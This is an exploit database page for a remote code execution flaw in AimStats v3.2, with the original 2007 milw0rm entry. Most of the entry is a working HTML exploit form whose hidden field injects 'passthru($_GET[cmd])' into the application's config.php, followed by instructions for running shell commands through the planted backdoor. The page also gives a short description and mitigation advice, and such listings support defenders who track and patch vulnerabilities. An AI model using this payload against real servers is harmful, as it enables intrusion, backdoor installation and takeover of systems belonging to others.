header-logo
Suggest Exploit
vendor:
AimStats
by:
Dj7xpl
7.5
CVSS
HIGH
Remote Code Execution
Unknown
CWE
Product Name: AimStats
Affected Version From: AimStats v3.2
Affected Version To: AimStats v3.2
Patch Exists: Unknown
Related CWE:
CPE: a:aimstats:aimstats:3.2
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

AimStats v3.2 Remote Code Execution

This exploit allows an attacker to execute arbitrary code remotely in AimStats v3.2. The vulnerability can be exploited by sending specially crafted requests to the vulnerable server. This can lead to unauthorized access and control over the affected system.

Mitigation:

Update to a patched version of AimStats that addresses the remote code execution vulnerability. Apply security best practices such as input validation and sanitization to prevent similar vulnerabilities.
Source

Exploit-DB raw data:

<!--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                                                                  +
+                                               Y! Underground Group                                               +
+                                                                                                                  +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                                                                  +
+          Portal......:  AimStats v3.2                                                                            +
+          Author......:  Dj7xpl / Dj7xpl@Yahoo.com                                                                +
+          Type........:  Remote Code Execution                                                                    +
+          Download....:  http://www.x-pose.org/aimstats.php                                                       +
+          Page........:  http://Dj7xpl.2600.ir                                                                    +
+                                                                                                                  +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                                                                  +
+          Xpl.........:                                                                                           + -->
<html><head><Title>---===AimStats v3.2===------===Dj7xpl===---</title></head>
<body bgcolor="red">
<center>
<form name="AimStats" method="post" action="http://site.com/path to aimstats/process.php?update=yes">
<input name="taglinelimit" value="777" type="hidden" >
<input name="number" value="11; passthru($_GET[cmd]);//;" type="hidden" >
<input type="submit" name="Submit" value="Submit" >
</form><br><br>
<font color="#C0FF3E" size="+1"> Please change Target And Run This Script</font><br>
<font color="#C0FF3E" size="+1"> And See Backdoor into http://[Target]/[Path]/config.php?cmd=shell</font></br>
<font color="#C0FF3E" size="+1"> E.g  :  http://site.com/aimstats/config.php?cmd=ls -la</font>
</center>
</body>
</html>
<!--
+                                                                                                                  +
+                                                                                                                  +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -->

# milw0rm.com [2007-04-18]